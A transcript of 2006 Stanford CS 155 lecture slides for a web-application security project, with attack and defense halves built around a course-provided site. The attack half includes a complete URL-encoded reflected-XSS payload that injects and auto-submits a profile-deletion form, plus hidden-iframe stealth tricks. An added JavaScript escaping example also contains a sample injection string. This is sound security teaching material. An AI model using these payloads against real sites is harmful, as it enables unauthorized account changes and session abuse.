Slide 1: Project 2: Web App Security
Collin Jackson
CS 155 Spring 2006
Slide 2: Deadlines
Slide 3: Part 1: Attacks
Slide 4: Overview
• Explore several attack types
• Requires both effectiveness and stealth
Learn:
• How an attacker can evade sanitization
• Consequences of an exploit
• JavaScript
• Very basic CSS
Slide 5: Attacks
Attack A: Cookie Theft. Use URL encoding; could hijack session.
Attack B: Silent Transfer. Navigate browser; use iframes, forms.
Attack C: Login Snooping. Evade sanitization; handle DOM events.
Attack D: Profile Worm. Confuse site scripts; replicate.
[Diagram: attack paths between zoobar.org, badguy.com and stanford.edu via link, email, form and redirect]
Slide 6: JavaScript
Browser scripting language with C-like syntax
Sandboxed, garbage collected
Closures:
  var x = 3; var y = function() { alert(x); }; return y;
Encapsulation/objects:
  function X() { this.y = 3; } var z = new X();
  alert(z.y);
Can interpret data as code (eval)
Browser-dependent
Slide 7: Invoking JavaScript
Tags: <script>alert('Hello world!')</script>
Links: javascript:alert('Hello world!')
  Wrap code in "void" if it has a return value
Event handlers: <form onsubmit="alert('Hello world!')"> <iframe onload="alert('Hello world!')">
CSS (IE only): <style>body { background: url(javascript:alert('Hello world!')); }</style>
Slide 8: DOM Manipulation Examples
  document.getElementById(id)
  document.getElementsByTagName(tag)
  document.write(htmltext)
  document.createElement(tagname)
  document.body.appendChild(node)
  document.forms[index].fieldname.value = …
  document.formname.fieldname.value = …
  frame.contentDocument.getElementById(id)
Slide 9: Arrays and Loops
Example: Change href of all links on a page
  var links = document.getElementsByTagName('a');
  for (var i = 0; i < links.length; i++) {
    var link = links[i];
    link.href = "javascript:alert('Sorry!');";
  }
Slide 10: Other Useful Functions
Navigation:
  document.location
  document.formname.submit()
  document.forms[0].submitfield.click()
Delayed Events:
  node.addEventListener(eventname, handler, useCapture)
  node.removeEventListener(eventname, handler, useCapture)
  window.setTimeout(handler, milliseconds)
Slide 11: Stealthy Styles
  var node = document.getElementById("mynodeid");
  node.style.display = 'none';       // may not load at all
  node.style.visibility = 'hidden';  // still takes up space
  node.style.position = 'absolute';  // not included in flow
  // can also write CSS rules to page
  document.write("<style>#mynodeid { visibility:hidden; }</style>");
Slide 12: Example: Profile Deleter
Malicious hyperlink deletes profile of user who clicks it
Only works when user logged in
  User might have multiple tabs open
  Might have chosen/forgotten not to log out
  Might appear in another user's profile
Uses vulnerability in users.php from Attack A
Constructs profile deletion form and submits it
Slide 13: Find vulnerability
Site reflects query parameter in input field
Link can include anything we want here
Slide 14: Copy form data
View source to find form fields
Create copycat form with our modifications
Slide 15
Close previous <input>, <form>
Button click triggers form submit
URL encode
Slide 16: Debugging
It didn't work. Open JavaScript console
Check error: "Undefined No properties!"
Two forms with same name
Slide 17: Fixed version
Now with correct form
Slide 18: Final Test
Profile deleted
users.php replaced with index.php
http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform%0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C%2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28%29%3C%2Fscript%3E
Slide 19: Stealthier approaches
Post form into hidden iframe:
  <form name=F action=/index.php target=myframe>…
  <iframe name=myframe style="visibility:hidden">…
Open page with form in hidden iframe:
  <iframe name=myframe style="visibility:hidden">…
  <script>document.myframe.contentDocument.forms[0].profile_update.value = "";</script>
Slide 20: Part 2: Defenses
Slide 21: Goals
Learn:
• How easy it is to make mistakes
• That even simple code can be hard to secure
• Techniques for appropriate input validation
• PHP
• Very basic SQL
A little programming knowledge can be a dangerous thing
Slide 22: PHP: Hypertext Preprocessor
Server scripting language with C-like syntax
Can intermingle static HTML and code:
  <input value=<?php echo $myvalue; ?>>
Encapsulation/objects:
  class X { var $y = 3; } $z = new X(); echo $z->y;
Can embed variables in double-quote strings:
  $user = "world"; echo "Hello $user!";
or
  $user = "world"; echo "Hello " . $user . "!";
Form data in global arrays $_GET, $_POST, …
Slide 23: SQL
Widely used database query language
Fetch a set of records:
  SELECT * FROM Person WHERE Username='grader'
Add data to the table:
  INSERT INTO Person (Username, Zoobars) VALUES ('grader', 10)
Modify data:
  UPDATE Person SET Zoobars=42 WHERE PersonID=5
Query syntax (mostly) independent of vendor
Slide 24: File structure
index.php
users.php
transfer.php
login.php
includes/
  auth.php (cookie authentication)
  common.php (includes everything else)
  navigation.php (site template)
db/
  zoobar/
    Person.txt (must be writable by web server)
Includes /usr/class/cs155/projects/pp2/txt-db-api/…
Only edit these files
Slide 25: txt-db-api
Third-party text file database library
Data can be int, string, and autoincrement
Need to escape strings: \' \" \\
Actually magic_quotes_gpc does this for us:
  $recipient = $_POST['recipient']; // already escaped
  $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
  $rs = $db->executeQuery($sql);
  if( $rs->next() )
    $id = $rs->getCurrentValueByName('PersonID');
Slide 26: Defenses to Part 1
Attack A: Cookie Theft
Attack B: Silent Transfer
Attack C: Login Snooping
Attack D: Profile Worm
Slide 27: Sanitization Techniques
addslashes(string)
  Already done by magic_quotes_gpc
  Inverse: stripslashes(string)
htmlspecialchars(string [, quote_style])
  Converts & < > " to HTML entities
  Use ENT_QUOTES to also change ' to &#039;
strip_tags(string [, allowable_tags])
  Max tag length 1024
  Does not sanitize tag properties
preg_replace(pattern, replacement, subject)
More info: http://php.net
Slide 28: More XSS hunting
Look for untrusted input used as output
  Note sanitization already applied to each variable
  Form data has magic_quotes_gpc, db data does not
Determine browser context for output
  Inside a quoted string within a tag – worry about ' "
  Outside a tag – worry about < >
  Input to eval – very dangerous
Sanitize the output if necessary
  No penalty for erring on the side of caution
  But sanitizing multiple times may lead to problems
No credit for solving non-goals: SQL injection, etc.
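The output-escaping rules from the Sanitization Techniques and More XSS hunting slides, as an added example that is not part of the original deck: it mirrors the character mapping of PHP's htmlspecialchars with ENT_QUOTES in JavaScript (so it runs under Node.js without the project's PHP files), renders the reflected user parameter into a quoted attribute and into page text, and checks for the double-escaping problem the slide warns about. The function names and the sample payload are assumptions constructed for this example.

```javascript
// Added example, not from the CS 155 deck: output escaping with the
// same character mapping as PHP's htmlspecialchars($s, ENT_QUOTES),
// written in JavaScript so it runs under Node.js without the project's
// PHP files. Function names and sample input are constructed here.

// Escape the five characters that can change browser context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;',
                '"': '&quot;', "'": '&#039;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Attribute context: the reflected `user` value goes into a QUOTED
// attribute and is escaped. Both matter: an unquoted attribute such as
// <input value=<?php echo $v ?>> lets a space end the value, and an
// unescaped quote lets the attacker close it.
function renderUserInput(user) {
  return '<input name="user" value="' + escapeHtml(user) + '">';
}

// Text context (outside a tag): < and > are the concern, and the same
// encoder covers it, so one encoder applied exactly once is the rule.
function renderUserHeading(user) {
  return '<h1>' + escapeHtml(user) + '</h1>';
}

// Check used in tests: the template itself contains exactly one '<'
// and four '"'; any extra means the input escaped its context.
function reflectedValueIsInert(user) {
  const html = renderUserInput(user);
  const lt = (html.match(/</g) || []).length;
  const quotes = (html.match(/"/g) || []).length;
  return lt === 1 && quotes === 4;
}

// Heuristic for the "sanitizing multiple times" problem: if escaping a
// value produces "&amp;lt;" and friends, it was already escaped and
// the page will show literal "&lt;" to the user.
function looksDoubleEscaped(alreadyEscaped) {
  return /&amp;(amp|lt|gt|quot|#039);/.test(escapeHtml(alreadyEscaped));
}

// Constructed sample with the shape of the slide's payload: close the
// attribute and the tag, then inject a form and a script.
const SAMPLE_PAYLOAD = '"><form name=profileform><script>alert(1)</script>';

console.log(renderUserInput(SAMPLE_PAYLOAD));
console.log('inert:', reflectedValueIsInert(SAMPLE_PAYLOAD));
console.log('double-escaped:', looksDoubleEscaped(escapeHtml('a<b')));
```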
Slide 29: Good luck!
Start early
Ask questions
Be creative